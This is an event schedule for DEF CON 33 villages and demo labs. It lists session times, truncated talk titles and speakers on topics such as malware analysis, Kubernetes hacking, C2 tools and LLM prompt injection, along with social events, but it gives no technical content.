14:00 - 17:59 Hands-on Kubernetes Attack & Defense Masterclass Madhu "madhuakula" Akula
14:00 - 17:59 Analyzing and Creating Windows Shellcode for Hacke . . . Bramwell Brizendine,Austi . . .
14:00 - 17:59 Obfuscation Reloaded: Modern Techniques for Evadin . . . Jake "Hubble" Krasnov,Vin . . .
14:00 - 17:59 Dive into Windows Library Loading Yoann "OtterHacker" DEQUE . . .
14:00 - 17:59 Fine Tune your personal LLM assistant to Secure co . . . Or Sahar,Yariv Tal
Saturday
09:00 - 12:59 Fortifying AI: Hands-On Training in Adversarial At . . . Vishal "Vish" Thakur,John . . .
09:00 - 12:59 Hands-On Threat Hunting with Wireshark Chris Greer
09:00 - 12:59 Eliminating Bug Classes at Scale: Leveraging Brows . . . Javan Rasokat
09:00 - 12:59 Pen-testing Cloud REST APIs Rodney Beede
09:00 - 12:59 Wi-Fi-So-Serious James Hawk,Brian Burnett
09:00 - 12:59 Practical YARA: Crafting Custom Rules for Targeted . . . Joshua "jstrosch" Strosch . . .
09:00 - 12:59 Reach the Nirvana Yoann "OtterHacker" DEQUE . . .
09:00 - 12:59 Advanced Ghidra Scripting & Automation Max "Libra" Kersten
14:00 - 17:59 Learning to Hack Bluetooth Low Energy with BLE CTF Ryan Holeman,Alek Amrani
14:00 - 17:59 Putting EDRs in Their Place: Killing and Silencing . . . Ryan "rj_chap" Chapman,Aa . . .
14:00 - 17:59 From Prompt to Protection: A Practical Guide to Bu . . . Ashwin Iyer,Ritika Verma
14:00 - 17:59 K8sploitation: Hacking Kubernetes the Fun Way Marcelo Ribeiro,Jeff Jord . . .
14:00 - 17:59 Hacking The Metal: Into the GPU eigentourist
14:00 - 17:59 Hacker VPN Eijah,Benjamin "Cave Twin . . .
14:00 - 17:59 Defeating Malware Evasion: Techniques and Counterm . . . Kyle "d4rksystem" Cucci,R . . .
14:00 - 17:59 Deep-dive into modern network fingerprinting Vlad Iliushin
Sunday
09:00 - 12:59 DIY Malware Emulation: Build It, Break It, Detect . . . Sebastian Tapia,Ricardo S . . .
09:00 - 12:59 Provably exfiltrating data by breaking TLS in the . . . AtHeartEngineer,Sinu
09:00 - 12:59 Hacking the connected plant: AI edition! Arnaud Soullié,Alexandri . . .
09:00 - 12:59 Creating malicious functional app on Android HackeMate
09:00 - 12:59 Cloud Forensics Workshop: Smart Grid Edition Kerry "Professor Kilroy" . . .
09:00 - 12:59 Disrupting Digital Dataflows: A 101 on how 2 detec . . . Preston Zen
09:00 - 12:59 Hands-on IoT firmware extraction and flash forensi . . . Dennis Giese,Braelynn Lue . . .
09:00 - 12:59 EMMC BGA Secrets, hack bga memory, no reballing ne . . . Patrick "Gigstorm" Kiley

Return to Index

DDV - Data Duplication Village

Location: LVCCWest-Level2-W225 - Map
Home Page: https://dcddv.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732732641694056478


PDT Times Title speaker
Thursday
16:00 - 18:59 DDV starts accepting drives for duplication
Friday
10:00 - 16:59 DDV open and accepting drives for duplication
13:00 - 13:59 Tracking 300k+ drives: What we’ve learned after . . . Pat Patterson,Stephanie D . . .
15:00 - 15:59 MFT2: More Fungible Threats Mauro Eldritch,Nelson Col . . .
Saturday
10:00 - 16:59 DDV open and accepting drives for duplication
13:00 - 13:59 Tracking 300k+ drives: What we’ve learned after . . . Pat Patterson,Stephanie D . . .
15:00 - 15:59 MFT2: More Fungible Threats Mauro Eldritch,Nelson Col . . .
Sunday
10:00 - 10:59 Last chance to pick up drives at the DDV

Return to Index

DL - DEF CON DemoLabs

Home Page: https://forum.defcon.org/node/252635
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_DL


PDT Times Title speaker
Friday
09:00 - 09:45 Dyna - Automating the OWASP MASTG with Offensive A . . . Arjun "T3R4_KAAL" Chaudha . . .
09:00 - 09:45 Spotter - Universal Kubernetes Security Scanner an . . . Madhu "madhuakula" Akula
09:00 - 09:45 RETCON - Reticulum Embedded Turnkey Connection Ope . . . Daniel "Varx" Beard
09:00 - 09:45 TheTimeMachine Arjun "T3R4_KAAL" Chaudha . . .
09:00 - 09:45 SAMLSmith Eric Woodruff,Tomer Nahum
10:00 - 10:45 AIMaL - Artificially Intelligent Malware Launcher Endrit Shaqiri,Natyra Sha . . .
10:00 - 10:45 AirBleed - Covert Bluetooth Plist Payload Injectio . . . Ray "CURZE$" Cervantes,Yv . . .
10:00 - 10:45 RETCON - Reticulum Embedded Turnkey Connection Ope . . . Daniel "Varx" Beard
10:00 - 10:45 Attack Flow and Root Cause Discovery - No LLMs, No . . . Ezz Tahoun,Kevin Shi
10:00 - 10:45 SAMLSmith Eric Woodruff,Tomer Nahum
11:00 - 11:45 Blackdagger - Cyber Workflow Automation Framework Mahmut "ErdemOzgen" Erdem . . .
11:00 - 11:45 BOAZ - A Multilayered Approach to AV/EDR Evasion E . . . Thomas "XM20" Xuan Meng
11:00 - 11:45 C4 - Cross Compatible Command and Control Scott "ScottCTaylor12" Ta . . .
11:00 - 11:45 Caldera for OT - Oops! All Software Devon Colmer,Tony Webber
11:00 - 11:45 rev.ng Decompiler Pietro Fezzardi,Alessandr . . .
12:00 - 12:45 Copycat - Identity Stealer Extension Dakshitaa Babu,Shourya Pr . . .
12:00 - 12:45 DVBE - Damn Vulnerable Browser Extension Abhinav Khanna
12:00 - 12:45 Empire 6.0 Vincent "Vinnybod" Rose,J . . .
12:00 - 12:45 EntraGoat - A Deliberately Vulnerable Entra ID Env . . . Tomer Nahum,Jonathan Elka . . .
12:00 - 12:45 FLARE-VM Joshua "jstrosch" Strosch . . .
13:00 - 13:45 Cryptosploit Matt Cheung
13:00 - 13:45 Have I Been Ransomed? Juanma "M4C" Tejada
13:00 - 13:45 Lex Sleuther Aaron "KNOX" James
13:00 - 13:45 Messenger - Proxies Here There and Everywhere Skyler Knecht,Kevin Clark
13:00 - 13:45 Unmanned Wireless Penetration Testing Device Ayaan Qayyum,Omar Hamoude . . .
14:00 - 14:45 Metasploit's Latest Attack Capability and Workflow . . . Spencer "ZeroSteiner" McI . . .
14:00 - 14:45 MPIT - Matrix Prompt Injection Tool and ShinoLLMAp . . . Shota "Sh1n0g1" Shinogi,S . . .
14:00 - 14:45 Nebula - 4 Years and Still Kicking *aaS Bleon "Gl4ssesbo1" Proko
14:00 - 14:45 nRootTag - Exploiting Find My and Transforming Com . . . Junming "Chapoly1305" Che . . .
14:00 - 14:45 OAuthSeeker Adam "UNC1739" Crosser
15:00 - 15:45 WarHead Vishal "Vish" Thakur,Davi . . .
15:00 - 15:45 GlytchC2 - Command Execution and Data Exfiltration . . . Anil Celik,Emre Odaman
15:00 - 15:45 Angry Magpie - DLP Bypass Simulator Jeswin Mathai,Xian Xiang . . .
15:00 - 15:45 Robin - The Archaeologist of the Dark Web Apurv "ASG_Sc0rpi0n" Sing . . .
15:00 - 15:45 Beaconator C2 Framework Mike "CroodSolutions" Man . . .
16:00 - 16:45 PAPRa Sean Marquez,Melanie "Gol . . .
16:00 - 16:45 PatchLeaks Huseyn "Khatai" Gadashov
16:00 - 16:45 promptmap2 Utku Sen
16:00 - 16:45 RETINA - Realtime Electronic Threat and Intrusion . . . Cesare "Red5heep" Pizzi
16:00 - 16:45 Tengu Marauder v2 Lexie "L3xic0n" Thach,Mun . . .
Saturday
09:00 - 09:45 Cryptosploit Matt Cheung
09:00 - 09:45 TheTimeMachine Arjun "T3R4_KAAL" Chaudha . . .
09:00 - 09:45 AIMaL - Artificially Intelligent Malware Launcher Endrit Shaqiri,Natyra Sha . . .
09:00 - 09:45 AirBleed - Covert Bluetooth Plist Payload Injectio . . . Ray "CURZE$" Cervantes,Yv . . .
09:00 - 09:45 Angry Magpie - DLP Bypass Simulator Jeswin Mathai,Xian Xiang . . .
10:00 - 10:45 Attack Flow and Root Cause Discovery - No LLMs, No . . . Ezz Tahoun,Kevin Shi
10:00 - 10:45 Beaconator C2 Framework Mike "CroodSolutions" Man . . .
10:00 - 10:45 Blackdagger - Cyber Workflow Automation Framework Mahmut "ErdemOzgen" Erdem . . .
10:00 - 10:45 BOAZ - A Multilayered Approach to AV/EDR Evasion E . . . Thomas "XM20" Xuan Meng
10:00 - 10:45 WarHead Vishal "Vish" Thakur,Davi . . .
11:00 - 11:45 Caldera for OT - Oops! All Software Devon Colmer,Tony Webber
11:00 - 11:45 Copycat - Identity Stealer Extension Dakshitaa Babu,Shourya Pr . . .
11:00 - 11:45 DVBE - Damn Vulnerable Browser Extension Abhinav Khanna
11:00 - 11:45 Empire 6.0 Vincent "Vinnybod" Rose,J . . .
11:00 - 11:45 Unmanned Wireless Penetration Testing Device Ayaan Qayyum,Omar Hamoude . . .
12:00 - 12:45 EntraGoat - A Deliberately Vulnerable Entra ID Env . . . Tomer Nahum,Jonathan Elka . . .
12:00 - 12:45 FLARE-VM Joshua "jstrosch" Strosch . . .
12:00 - 12:45 GlytchC2 - Command Execution and Data Exfiltration . . . Anil Celik,Emre Odaman
12:00 - 12:45 Have I Been Ransomed? Juanma "M4C" Tejada
12:00 - 12:45 Lex Sleuther Aaron "KNOX" James
13:00 - 13:45 Messenger - Proxies Here There and Everywhere Skyler Knecht,Kevin Clark
13:00 - 13:45 Robin - The Archaeologist of the Dark Web Apurv "ASG_Sc0rpi0n" Sing . . .
13:00 - 13:45 MPIT - Matrix Prompt Injection Tool and ShinoLLMAp . . . Shota "Sh1n0g1" Shinogi,S . . .
13:00 - 13:45 Nebula - 4 Years and Still Kicking *aaS Bleon "Gl4ssesbo1" Proko
13:00 - 13:45 nRootTag - Exploiting Find My and Transforming Com . . . Junming "Chapoly1305" Che . . .
14:00 - 14:45 OAuthSeeker Adam "UNC1739" Crosser
14:00 - 14:45 PAPRa Sean Marquez,Melanie "Gol . . .
14:00 - 14:45 PatchLeaks Huseyn "Khatai" Gadashov
14:00 - 14:45 promptmap2 Utku Sen
14:00 - 14:45 RETINA - Realtime Electronic Threat and Intrusion . . . Cesare "Red5heep" Pizzi
15:00 - 15:45 Dyna - Automating the OWASP MASTG with Offensive A . . . Arjun "T3R4_KAAL" Chaudha . . .
15:00 - 15:45 Metasploit's Latest Attack Capability and Workflow . . . Spencer "ZeroSteiner" McI . . .
15:00 - 15:45 rev.ng Decompiler Pietro Fezzardi,Alessandr . . .
15:00 - 15:45 Garuda Threat Hunting Framework Monnappa "Monnappa22" K A . . .
15:00 - 15:45 RETINA - Realtime Electronic Threat and Intrusion . . . Cesare "Red5heep" Pizzi
16:00 - 16:45 Tengu Marauder v2 Lexie "L3xic0n" Thach,Mun . . .
16:00 - 16:45 Metasploit's Latest Attack Capability and Workflow . . . Spencer "ZeroSteiner" McI . . .
16:00 - 16:45 C4 - Cross Compatible Command and Control Scott "ScottCTaylor12" Ta . . .
16:00 - 16:45 Garuda Threat Hunting Framework Monnappa "Monnappa22" K A . . .
16:00 - 16:45 Spotter - Universal Kubernetes Security Scanner an . . . Madhu "madhuakula" Akula

Return to Index

ESV - Embedded Systems Village

Location: LVCCWest-Level1-Hall1-W401 - Map
Home Page: https://embeddedvillage.org/


PDT Times Title speaker
Saturday
10:00 - 10:59 How Not to IoT: Lessons in Security Failures Zoltan "zh4ck" Balazs

Return to Index

GHV - Game Hacking Village

Location: LVCCWest-Level1-Hall1-W402
Home Page: https://gamehacking.gg/


PDT Times Title speaker
Friday
14:00 - 14:45 Game Hacking 101 Julian "Julez" Dunning
Saturday
13:00 - 13:45 What Game Hackers teach us about Offensive Securit . . . Joe "Juno" Aurelio

Return to Index

HHV - Hardware Hacking and Solder Skills Villages

Location: LVCCWest-Level1-Hall2-W802 - Map
Home Page: https://dchhv.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732728536149786665


PDT Times Title speaker
Friday
17:00 - 17:59 All your keyboards are belong to us! Federico Lucifredi
Saturday
14:00 - 14:59 The Missing Link: Draytek’s New RCEs Complete th . . . Octavio Gianatiempo,Gasto . . .
Sunday
12:30 - 12:59 The Power(Point) Glove Parsia "CryptoGangsta" Ha . . .

Return to Index

HRV - Ham Radio Village

Location: LVCCWest-Level3-W321 - Map
Home Page: https://hamvillage.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732733631667372103


PDT Times Title speaker
Friday
13:00 - 15:59 Free Ham Radio Exams
Saturday
11:00 - 16:59 Free Ham Radio Exams
Sunday
11:00 - 12:59 Free Ham Radio Exams

Return to Index

ICSV - Industrial Control Systems Village

Location: LVCCWest-Level1-Hall2-W805 - Map
Home Page: https://www.icsvillage.com/
DC Discord Chan: https://discord.com/channels/708208267699945503/735938018514567178


PDT Times Title speaker
Friday
10:30 - 10:59 Hull Integrity: Applying MOSAICS to Naval Mission . . . Michael Frank
10:00 - 10:30 Safeguarding the Industrial Frontier: OT SOC & Inc . . . Adam Robbie
10:00 - 10:30 Fear vs. Physics: Diagnosing Grid Chaos Emma Stewart
15:30 - 15:59 Locked Down, Not Locked Out: How I Escaped Your Se . . . Aaron Boyd
17:30 - 17:59 Crossing the Line: Advanced Techniques to Breach t . . . Christopher Nourrie
Saturday
10:00 - 10:30 Critically Neglected: Cybersecurity for buildings Thomas Pope
13:00 - 13:30 Deploying Deception in Depth for ICS Brent Muir
14:00 - 14:30 OT Network Segmentation Planning, Implementation, . . . Tony Turner
15:00 - 15:30 There and Back Again: Discovering OT devices acros . . . Rob King
Sunday
10:30 - 10:59 Don’t Cry Wolf: Evidence-based assessments of IC . . . Jimmy Wylie,Sam Hanson
11:30 - 11:59 Intro to Common Industrial Protocol Exploitation Trevor Flynn
12:30 - 12:59 The Worst ICS/OT Love Story Ever Told Mike Holcomb

Return to Index

IOTV - Internet Of Things Village

Location: LVCCWest-Level1-Hall2-W605 - Map
Home Page: https://www.iotvillage.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732734565604655114


PDT Times Title speaker
Friday
10:30 - 10:59 10 Years of IoT Village: Insights in the World of . . . Stephen Bono,Rachael Tubb . . .
11:45 - 12:30 Never enough about cameras - The firmware encrypti . . . Alexandru Lazar
11:00 - 11:59 Go Malware Meets IoT: Challenges, Blind Spots, and . . . Asher Davila
13:00 - 13:45 What is Dead May Never Die: The Immortality of SDK . . . Richard "HeadlessZeke" La . . .
15:00 - 15:59 Contextualizing alerts & logs at scale without que . . . Ezz Tahoun
17:30 - 17:59 Vibe School: Making dumb devices smart with AI Katie "InsiderPhD" Paxton . . .
Saturday
11:00 - 11:59 No Brain No Gain Mehmet Önder Key,Temel D . . .
12:00 - 12:30 What’s Really in the Box? The Case for Hardware . . . Allan Friedman
13:45 - 14:15 The Things know What You Did Last Session Will Baggett
Sunday
11:30 - 11:59 Unveiling IoT Vulnerabilities: From Backdoors to B . . . Kai-Ching "Keniver" Wang
12:00 - 12:30 Smart Devices, Dumb Resets? Testing Firmware Persi . . . Matei Josephs
12:00 - 12:30 Firmware Decryption: For, and By, the Cryptographi . . . Craig Heffner

Return to Index

MHV - Maritime Hacking Village

Location: LVCCWest-Level1-Hall2-W504
Home Page: https://maritimehackingvillage.com/


PDT Times Title speaker
Friday
15:00 - 15:45 Threat Dynamics on the Seas RADM John Mauger,Michael . . .
15:45 - 16:30 Fighting the Digital Blockade: A View from Taiwan Deputy Minister Herming C . . .
17:30 - 17:59 Hacking the Nautical Rules of the Road: Turn Left . . . Amp,Data
Saturday
10:30 - 10:59 Navigating the Invisible Mehmet Önder Key,Furkan . . .
11:30 - 11:59 State of the Pops: Mapping the Digital Waters Vlatko Kosturjak,MJ Casad . . .
15:00 - 15:30 Pirates of the North Sea John Andre Bjørkhaug
16:30 - 16:59 Resilient and Reconfigurable Maritime Comms. AviNash Srinivasan
16:30 - 16:59 How Computers Kill People: Marine Systems Michael DeVolld,Austin Re . . .
16:00 - 16:30 Dead Reckoning: Hijacking Marine Autopilots Carson Green,Rik Chatterj . . .
16:00 - 16:30 Fingerprinting Maritime NMEA2000 Networks Constantine Macris (TheDi . . .
Sunday
12:30 - 12:59 Red Alerts and Blue Oceans: Incident Response from . . . Capt. Kit Louttit,Steve W . . .

Return to Index

MISC - Misc

Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_MISC


PDT Times Title speaker
Wednesday
11:00 - 17:59 The Unofficial DEF CON Shoot
17:00 - 07:59 Linecon
Thursday
06:00 - 07:59 Defcon.run
08:00 - 18:59 Human Registration Open
09:00 - 18:59 Lost & Found
15:00 - 20:59 Toxic BBQ
Friday
06:00 - 07:59 Defcon.run
08:00 - 18:59 Human Registration Open
10:00 - 01:59 Lost & Found
10:30 - 11:30 AixCC Award Announcement
10:00 - 10:59 Book Signing - Adversary Emulation with MITRE ATT& . . . Drinor Selmanaj
10:00 - 10:59 Book Signing - Cyber Calendar 2026 - Chris DeCarme . . . Chris DeCarmen
11:00 - 11:59 Book Signing - Jon DiMaggio/ No Starch Press Jon DiMaggio
11:00 - 11:59 Book Signing - Supply Chain Software Security-AI, . . . Aamiruddin Syed
12:00 - 12:59 Book Signing - Travis Goodspeed/No Starch Press Travis Goodspeed
12:00 - 12:59 Book Signing - Firewalls Don't Stop Dragons: A Ste . . . Carey Parker
13:00 - 13:59 Book Signing - Nick Aleks/No Starch Press Nick Aleks
13:00 - 13:59 Book Signing - Alex Matrosov/No Starch Press Alex Matrosov
14:00 - 14:59 Book Signing - Philip Dunsey/No Starch Press Philip Dunsey
14:00 - 14:59 Book Signing - Alfie Champion/No Starch Press Alfie Champion
15:00 - 15:59 Book Signing - JP Ausmasson/No Starch Press JP Ausmasson
15:00 - 15:59 Book Signing - Future of Hacking: The Rise of Cybe . . . Laura S. Scherling, EdD
15:00 - 15:59 Book Signing - Daniel Reilly/No Starch Press Daniel Reilly
15:00 - 15:59 Book Signing - The Hacker Mindset: A 5-Step Method . . . Garrett Gee
16:00 - 17:59 Um, ACKtually...
16:00 - 16:59 Book Signing - - Jim O'Gorman/No Starch Press
16:00 - 16:59 Book Signing - Breaking IN: A Practical Guide To S . . . Ayman Elsawah
19:00 - 01:59 Hacker Karaoke
Saturday
06:00 - 07:59 Defcon.run
09:00 - 18:59 Human Registration Open
10:00 - 01:59 Lost & Found
10:00 - 10:59 Book Signing - Kyle Cucci/No Starch Press Kyle "d4rksystem" Cucci
10:00 - 10:59 Book Signing - Cyber Calendar 2026 - Chris DeCarme . . . Chris DeCarmen
10:00 - 10:59 Book Signing - Patrick Wardle/ No Starch Press Patrick Wardle
10:00 - 10:59 Book Signing - Adversary Emulation with MITRE ATT& . . . Drinor Selmanaj
11:00 - 11:59 Book Signing - Corey Ball/No Starch Press Corey Ball
11:00 - 11:59 Book Signing - Casey Edman/No Starch Press Casey Edman
11:00 - 11:59 Book Signing - Future of Hacking: The Rise of Cybe . . . Laura S. Scherling, EdD
12:00 - 12:59 Book Signing - Micah Lee/ No Starch Press Micah "micahflee" Lee
12:00 - 12:59 Book Signing - Practical Lock Picking; Keys to the . . . Deviant Ollam
13:00 - 13:59 Book Signing - Eugene Lim/ No Starch Press Eugene "spaceraccoon" Lim
14:00 - 14:59 Book Signing - Fotis Chantizis/ No Starch Press Fotis Chantizis
14:00 - 14:59 Book Signing - Cyber Calendar 2026 - Chris DeCarme . . . Chris DeCarmen
14:00 - 14:59 Book Signing - Paulino Calderon/No Starch Press Paulino Calderon
14:00 - 14:59 Book Signing - The Hacker Mindset: A 5-Step Method . . . Garrett Gee
14:00 - 15:59 DC Book Club Discussion
15:00 - 15:59 Book Signing - Jason Andress/ No Starch Press Jason Andress
15:00 - 15:59 Book Signing - Kara Nance/No Starch Press Kara Nance
15:00 - 15:59 Book Signing - The Browser Security Field Manual A . . . Audrey Adeline
16:00 - 16:59 Book Signing - Breaking IN: A Practical Guide To S . . . Ayman Elsawah
19:00 - 01:59 Hacker Karaoke
Sunday
06:00 - 07:59 Defcon.run
09:00 - 11:59 Human Registration Open
10:00 - 13:59 Lost & Found
10:00 - 10:59 Book Signing - Ghost Hacker : How to hack human sp . . . Jun “Ghost Hacker” Ka . . .

Return to Index

MWV - Malware Village

Location: LVCCWest-Level1-Hall1-W303
Home Page: https://malwarevillage.org/


PDT Times Title speaker
Friday
10:00 - 10:30 Break Systems, Not Promises: I promised to do a ke . . . Lena "LambdaMamba" Yu
10:00 - 12:59 Getting started in Malware Analysis with Ghidra Wesley McGrew
10:40 - 11:10 Malware Matryoshka: Nested Obfuscation Techniques Brian Baskin
11:20 - 11:50 Cryptography is hard: Breaking the DoNex ransomwar . . . Gijs Rijnders
12:00 - 12:30 KeePass, weaponized Juho Jauhiainen
12:40 - 13:10 Grandoreiro & friends: brazilian banking trojans t . . . Josep Albors
13:40 - 13:55 Using Stardew Valley mods as a C2 and infostealer Gecko
14:30 - 14:59 Compromising Threat Actor Communications Ben "polygonben" Folland
14:00 - 14:15 The creation of the Malmongotchi badge Austin Worline
14:00 - 17:59 Binary exploitation basics Leigh Trinity
15:50 - 16:20 Silent Sigma: Unraveling Iranian APT's 0-Day Warf . . . Christopher Dio Chavez
15:10 - 15:40 North Korea's Fur Shop: Poaching for Otters, Beave . . . Mauro Eldritch,José Góm . . .
16:30 - 16:59 ClickFix: The Malware Delivery Technique Enabling . . . Arda Büyükkaya
17:50 - 18:20 Domain Fronting in 2025: a retro analysis Tom Cope
17:10 - 17:40 The Beauty of Reversing Swift Malware Chistopher Lopez
Saturday
10:00 - 10:30 Making Dirty Pictures - The Issue with DICOM Michael "v3ga" Aguilar
10:00 - 12:59 Malware and Monsters Klaus Agnoletti
10:40 - 11:10 Your Static Tools Are Cute - My AI Ripped ZebLoade . . . Anna Pham,Edward Crowder
11:20 - 11:50 Smashing the Sandbox: Inside DBatLoader's Unique E . . . Kyle "d4rksystem" Cucci
12:00 - 12:10 I Can't RE (and You Can Too!) Johnny Xmas
13:40 - 14:15 Enshittification: It's Over 9000 Lena "LambdaMamba" Yu,And . . .
14:30 - 14:59 The Cookie Heist: How Cybercriminals Are Outsmarti . . . Mrigakshi Goel
14:00 - 17:59 Mac Malware Analysis Patrick Wardle
15:50 - 16:20 Deconstructing Malware Lineage with Graph Neural N . . . David Rushmer
15:10 - 15:40 Unveiling the shadows: Digital Forensics evidence . . . Neumann "scsideath" Lim,J . . .
16:00 - 16:30 Exposing Infosec Frauds and Foreign Agents Behind . . . Cthulhu
17:50 - 18:20 NO-HAVOC today, NO-HAVOC tomorrow Lena "LambdaMamba" Yu,Sam . . .
17:10 - 17:40 The Quantum Shift: Practical Post-Quantum Risk: Al . . . Sean Prescott,Ted Carefoo . . .
Sunday
16:00 - 16:30 Exposing Infosec Frauds and Foreign Agents Behind . . . Cthulhu

Return to Index


PDT Times Title speaker
Friday
10:15 - 10:30 Intro to village Leigh-Anne Galloway
10:30 - 10:59 Card testing workshop Vince Sloan
11:00 - 11:59 BT hacking Dan Bongiorno
11:00 - 11:59 Carding is Dead, Long Live Carding: How MaaS is fu . . . Federico Valentini,Alessa . . .
11:00 - 11:59 More is less
12:00 - 12:30 Risk and payments across the ecosystem Gary Kao
14:00 - 14:45 The challenges of Sub-dermal Payments Amal Graafstra
15:00 - 15:30 Passkeys in payments Dan Pelegro
16:00 - 16:30 Network tokens Sanjeev Sharma
Saturday
10:15 - 10:30 Intro to village Leigh-Anne Galloway
10:30 - 10:59 Card testing workshop Vince Sloan
11:00 - 11:59 Frida for reverse engineering payment applications Ileana Barrionuevo
11:00 - 11:59 GenAI red teaming for Payment Fraud Karthik Tadinada,Martyn H . . .
11:00 - 11:59 The social engineering industry
14:00 - 14:45 Voices of the Industry: A Fireside Chat with Payme . . . Leigh-Anne Galloway,Giust . . .
15:00 - 15:30 Beyond the Stack: How External Failures Impact Pay . . . Tapan Khilnani
16:30 - 17:30 Brazil's aPIXcalypse - How real time payments turn . . . Anchises Moraes

Return to Index


PDT Times Title speaker
Thursday
12:00 - 12:59 Friends of Bill W
16:00 - 18:59 DEF CON Holland Group Presents: 
Drinking with t . . .
17:00 - 17:59 Friends of Bill W
19:00 - 20:59 DC702 Meetup
19:30 - 22:30 The KEVOPS Sellout Pool Party
Friday
06:00 - 10:59 Cycle Override
12:00 - 12:59 Friends of Bill W
16:00 - 16:30 Cybersecurity in Latin America: The Untold Stories . . . Giovanni Cruz Forero
16:00 - 17:59 Queercon Mixer
17:00 - 17:59 Friends of Bill W
18:00 - 20:59 Lawyers Meet
18:00 - 20:59 Spades Tournament & Game Night Social
18:00 - 21:59 BIC Village Game Night
19:00 - 00:59 BlanketFort Con
20:00 - 22:59 DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup
21:00 - 23:30 Women, gender non-conforming and non-binary meetup . . .
21:00 - 01:59 Arcade Party
21:00 - 23:59 IoT Village 10th Birthday Party
22:00 - 01:59 +61: the Australian Embassy
Saturday
12:00 - 12:59 Friends of Bill W
14:00 - 15:59 Sticker Swap at DEF CON 33
16:00 - 17:59 Queercon Mixer
17:00 - 17:59 Friends of Bill W
19:30 - 22:59 DC NextGen
19:30 - 22:30 The DEF CON Pool Party
20:00 - 23:59 The Jasmine Dragon
21:00 - 01:59 Cyberdelia Rave
21:00 - 01:59 Day of the Dead Hacker Party
21:00 - 01:59 GOTHCON
21:00 - 01:59 The Illuminati Party
21:00 - 01:59 VETCON 2025 Party
22:00 - 01:59 Call Center Village Party
Sunday
12:00 - 12:59 Friends of Bill W

Return to Index

PHV - Packet Hacking Village

Location: LVCCWest-Level3-W303-W310 - Map
Home Page: https://www.wallofsheep.com/
DC Discord Chan: https://discord.com/channels/708208267699945503/708242376883306526


PDT Times Title speaker
Friday
13:00 - 13:59 Teaching Your Reverse Proxy to Think: Fingerprint- . . . Adel Karimi
Saturday
13:00 - 13:59 Deepfake Image and Video Detection   Mike Raggo
16:00 - 16:59 SSH Honeypots and Walkthrough Workshops: A History Ryan Mitchell
17:00 - 17:59 Hacking Context for Auto Root Cause and Attack Flo . . . Ezz Tahoun

Return to Index

PLV - Policy Village

Location: LVCCWest-Level2-W234 - Map
Home Page: https://defcon.org/policy/


PDT Times Title speaker
Friday
11:00 - 11:45 State of Open Source in the Federal Government Jordan Kasper
11:45 - 12:30 Dark Capabilities: When Tech Companies Become Thre . . . Tom Cross,Greg Conti
13:00 - 13:45 Takes All Kinds: Building Onramps for Emergency We . . . Quinn Dombrowski
13:45 - 14:30 Third-Party Access Granted: A Postmortem on Studen . . . Sharlene Toney
15:00 - 15:45 What Europeans are doing right about cyber securit . . . Muhammad Mudassar Yamin,E . . .
15:45 - 16:30 Secure Code Is Critical Infrastructure: Hacking Po . . . Tanya "SheHacksPurple" Ja . . .
Saturday
16:00 - 16:30 China's Health Sector Ambitions and Information Ne . . . Amelia Shapiro
Sunday
12:30 - 12:59 Legalizing Ethical Hacking: A Global Safe Harbor f . . . Miracle "OWOLABI" Abiodun

Return to Index

PSV - Physical Security Village

Location: LVCCWest-Level1-Hall2-W804 - Map
Home Page: https://www.physsec.org/
DC Discord Chan: https://discord.com/channels/708208267699945503/732732893830447175


PDT Times Title speaker
Friday
12:00 - 12:59 Flipping Locks - Remote Badge Cloning with the Fli . . . Langston Clements,Dan Gog . . .
14:00 - 14:59 Hacking Hotel Locks; The Saflok Vulnerabilities Ex . . . Noah Holland,Josh Stiebel
16:30 - 16:59 Access Control Done Right the First Time Tim Clevenger
Saturday
12:00 - 12:59 From Pwn to Plan: Turning Physical Exploits Into U . . . Shawn
12:00 - 12:59 How NOT to Perform Covert Entry Assessments by WeH . . . Brent White,Tim Roberts
16:00 - 16:30 Your Passkey is Weak: Phishing the Unphishable Chad Spensky
Sunday
10:00 - 10:59 Intro to Physical Security Bypass Karen Ng,Matthew Cancilla
10:00 - 10:59 Elevators 101 Bobby Graydon,Ege Feyziog . . .
12:00 - 12:59 Airport Security! - S01 E008 - Breaking into your . . . Hector Cuevas Cruz

Return to Index

QTV - Quantum Village

Location: LVCCWest-Level1-Hall1-W206 - Map
Home Page: https://quantumvillage.org/


PDT Times Title speaker
Friday
10:00 - 10:59 QC Intro Sohum Thakkar
12:00 - 12:59 EduQ: A DIY Self-Education Platform for Hackers to . . . Yann Allain
16:00 - 17:59 Quantum Table Top Threat Modelling Jaya Baloo
Saturday
10:00 - 11:15 Quantum Pictorialism for Hackers Bob Coecke
16:30 - 17:15 Post-Quantum Panic: When Will the Cracking Begin, . . . Konstantinos Karagiannis

Return to Index

RTV - Red Team Village

Location: LVCCWest-Level1-Hall1-W405-Red Team Village - Map
Home Page: https://redteamvillage.io/


PDT Times Title speaker
Friday
08:30 - 09:59 Cyber Wargames: King of the Hill
09:00 - 14:59 Cyber Wargames: Strategic Operations
11:00 - 11:50 Mind vs. Machine: Finding the Sweet Spot in Modern . . . Ben "nahamsec" Sadeghipou . . .
12:00 - 13:50 AIMaL: Artificially Intelligent Malware Launcher Endrit Shaqiri,Natyra Sha . . .
12:00 - 13:50 GlytchC2: Command execution and data exfiltration . . . Anıl Çelik,Emre Odaman
12:00 - 15:50 Instant API Hacker! Corey Ball
12:00 - 13:50 Vector Space Manipulation in LLMs Muhammad Mudassar Yamin
12:00 - 13:50 Bridge to Nowhere Good: When Azure Relay becomes a . . . Edward Landers,Josh Huff, . . .
12:00 - 12:50 Don't be LLaMe - The basics of attacking LLMs in y . . . Alex Bernier,Brent Harrel . . .
12:00 - 12:50 Stealing Browser Cookies: Bypassing the newest Chr . . . Rafael Felix
12:00 - 13:50 OSINT for Hackers Lee McWhorter,Sandra Stib . . .
13:00 - 13:50 Weaponizing Kestrel: Red Team Tradecraft for Hunti . . . Daniel Benavides,Ronald G . . .
13:00 - 13:50 Red Teaming Kubernetes: From App-Level CVEs to Ful . . . Lenin Alevski
14:00 - 15:50 Initial Access Tactics on MacOS Adwiteeya Agrawal,Jianqia . . .
14:00 - 15:50 Stealing Browser Cookies: Bypassing the newest Chr . . . Rafael Felix
14:00 - 15:50 A Look into Using Native Godot Calls to Create Mal . . . Aaron Hogan
